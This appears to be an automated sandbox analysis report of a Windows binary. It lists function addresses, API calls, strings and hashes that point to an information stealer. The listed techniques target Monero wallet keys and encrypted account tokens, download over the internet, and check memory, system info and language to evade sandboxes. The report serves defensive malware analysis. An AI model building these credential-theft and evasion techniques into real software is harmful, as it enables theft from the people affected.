Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: adcb242ebf76658bceb4c17ea73a6e9a294fecee09916cce6897ac5d7b89b35c
Instruction ID: b4f30f3531c23c6468e34b8f29ef6c6cf1b6f18fb0124711a16c908d38482226
Opcode Fuzzy Hash: adcb242ebf76658bceb4c17ea73a6e9a294fecee09916cce6897ac5d7b89b35c
Instruction Fuzzy Hash: 57612AB590426C9BDB24DB54CC55BDAB7BCFF48300F0081E9E689A6241EB745BC9CFA1

Function 0081BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

lstrlen.KERNEL32(00000000), ref: 0081BC9F

Part of subcall function 00828E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0081BCCD
lstrlen.KERNEL32(00000000), ref: 0081BDA5
lstrlen.KERNEL32(00000000), ref: 0081BDB9

Strings

AccountTokens, xrefs: 0081BABA
SELECT service, encrypted_token FROM token_service, xrefs: 0081BBEB
AccountId, xrefs: 0081BCC4
AccountTokens, xrefs: 0081BB49

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 64480474025d94300e3a57db10e39cb9dde8fdcb54f821cce21c0d13c0412932
Instruction ID: 749c07a927bdb6e598771b23f8178260d88868db443782098d2ca0c47d1e03f5
Opcode Fuzzy Hash: 64480474025d94300e3a57db10e39cb9dde8fdcb54f821cce21c0d13c0412932
Instruction Fuzzy Hash: 1BB11E719101289BDB08EBA4ED96EEE777CFF54300F404568F506E6191EF346A89CBA3

Function 00814FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00814FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00814FD1
InternetOpenA.WININET(00830DDF,00000000,00000000,00000000,00000000), ref: 00814FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00815011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00815041
InternetCloseHandle.WININET(?), ref: 008150B9
InternetCloseHandle.WININET(?), ref: 008150C6

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 456b9b028ad4b15e74ff78107fdb37ee0970a0e1e517d0eb38b3247f44256a47
Instruction ID: a3efc025f773d7b46e23bf1d6eb2a7313ad35633d048ea8784170a67f478cf42
Opcode Fuzzy Hash: 456b9b028ad4b15e74ff78107fdb37ee0970a0e1e517d0eb38b3247f44256a47
Instruction Fuzzy Hash: 5531E7B4A00218EBDB20CF94DC85BDDB7B4FF48705F1081D9E609A7281D7706AC58F99

Function 00828100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00EFDE48,00000000,?,00830E2C,00000000,?,00000000), ref: 00828130
RtlAllocateHeap.NTDLL(00000000), ref: 00828137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00828158
wsprintfA.USER32 ref: 008281AC

Strings

%d MB, xrefs: 008281A3
@, xrefs: 0082814D

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: f0e24033f5dc79a1133ce9c7cc45b7bb73b27a09c1bd65be565c22b16d1b36cd
Instruction ID: 1d3e2a46b2058d0f3141d4bb039f68f7ca036d0580a3d69223b4c5289dae9d4d
Opcode Fuzzy Hash: f0e24033f5dc79a1133ce9c7cc45b7bb73b27a09c1bd65be565c22b16d1b36cd
Instruction Fuzzy Hash: 38211FB1E44318ABDB00DFD4DC49FAEBBB8FB44715F104609F615BB280D77859418BA5

Function 008283DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00828426
wsprintfA.USER32 ref: 00828459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0082847B
RegCloseKey.ADVAPI32(00000000), ref: 0082848C
RegCloseKey.ADVAPI32(00000000), ref: 00828499

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

RegQueryValueExA.KERNEL32(00000000,00EFDF20,00000000,000F003F,?,00000400), ref: 008284EC
lstrlen.KERNEL32(?), ref: 00828501
RegQueryValueExA.KERNEL32(00000000,00EFDEA8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00830B34), ref: 00828599
RegCloseKey.KERNEL32(00000000), ref: 00828608
RegCloseKey.ADVAPI32(00000000), ref: 0082861A

Strings

%s\%s, xrefs: 0082844D

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: a6885e09525fc3846318548edc3b195527aa50826066f6789381da2d94792ce9
Instruction ID: fdaeae6c10a2d02b5302232cebd1e70e8a4e49a765b7ad4744fa0bd6c49663e6
Opcode Fuzzy Hash: a6885e09525fc3846318548edc3b195527aa50826066f6789381da2d94792ce9
Instruction Fuzzy Hash: 08210771A1022CABDB24DB94DC85FE9B7B8FB58701F00C698E609A6140DF716A86CFD4

Function 00827690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008276A4
RtlAllocateHeap.NTDLL(00000000), ref: 008276AB
RegOpenKeyExA.KERNEL32(80000002,00EEBA80,00000000,00020119,00000000), ref: 008276DD
RegQueryValueExA.KERNEL32(00000000,00EFDE60,00000000,00000000,?,000000FF), ref: 008276FE
RegCloseKey.ADVAPI32(00000000), ref: 00827708

Strings

Windows 11, xrefs: 008276BD

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 5cc62abe0db5fadd107db5d2cbfab4aa08933504115b7f149d14198a3985d666
Instruction ID: f3e84de20aa25fc964f285f09b65461137701370c3a13439e009c364d9f032d7
Opcode Fuzzy Hash: 5cc62abe0db5fadd107db5d2cbfab4aa08933504115b7f149d14198a3985d666
Instruction Fuzzy Hash: BB014FB5B04308BFD700DBE5EC49F6DBBB8FB58702F108154FA05D7291E67099458B51

Function 00827720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827734
RtlAllocateHeap.NTDLL(00000000), ref: 0082773B
RegOpenKeyExA.KERNEL32(80000002,00EEBA80,00000000,00020119,008276B9), ref: 0082775B
RegQueryValueExA.KERNEL32(008276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0082777A
RegCloseKey.ADVAPI32(008276B9), ref: 00827784

Strings

CurrentBuildNumber, xrefs: 00827771

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 09838ae6310b96b2d1bc0cab2be267f4e7c384890b4c4be4079803e9695418ee
Instruction ID: bec4e2f0a6588a95d0dfca599177b38595a0c1e78c3df9a1e8b0df1085a852bd
Opcode Fuzzy Hash: 09838ae6310b96b2d1bc0cab2be267f4e7c384890b4c4be4079803e9695418ee
Instruction Fuzzy Hash: F301F4B5A40308BFDB00DFE4DC49FAEBBB8FB58705F104655FA05E7281D67455418B51

Function 008269F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF0558), ref: 008298A1
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF0660), ref: 008298BA
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF0768), ref: 008298D2
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF0720), ref: 008298EA
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF06F0), ref: 00829903
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF8900), ref: 0082991B
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EE6360), ref: 00829933
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EE6560), ref: 0082994C
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF0678), ref: 00829964
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF0780), ref: 0082997C
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF0798), ref: 00829995
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF07B0), ref: 008299AD
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EE62C0), ref: 008299C5
Part of subcall function 00829860: GetProcAddress.KERNEL32(75900000,00EF0810), ref: 008299DE

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 008111D0: ExitProcess.KERNEL32 ref: 00811211

Part of subcall function 00811160: GetSystemInfo.KERNEL32(?), ref: 0081116A
Part of subcall function 00811160: ExitProcess.KERNEL32 ref: 0081117E

Part of subcall function 00811110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0081112B
Part of subcall function 00811110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00811132
Part of subcall function 00811110: ExitProcess.KERNEL32 ref: 00811143

Part of subcall function 00811220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0081123E
Part of subcall function 00811220: ExitProcess.KERNEL32 ref: 00811294

Part of subcall function 00826770: GetUserDefaultLangID.KERNEL32 ref: 00826774

Part of subcall function 00811190: ExitProcess.KERNEL32 ref: 008111C6

